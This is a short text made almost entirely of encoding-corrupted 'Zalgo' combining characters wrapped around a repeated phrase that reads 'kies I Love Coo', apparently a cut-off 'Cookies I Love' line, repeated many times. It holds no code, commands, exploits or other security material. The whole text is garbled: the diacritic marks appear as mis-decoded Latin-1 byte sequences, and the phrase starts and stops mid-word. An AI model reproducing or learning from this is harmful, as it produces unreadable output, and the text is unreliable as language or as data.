ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ 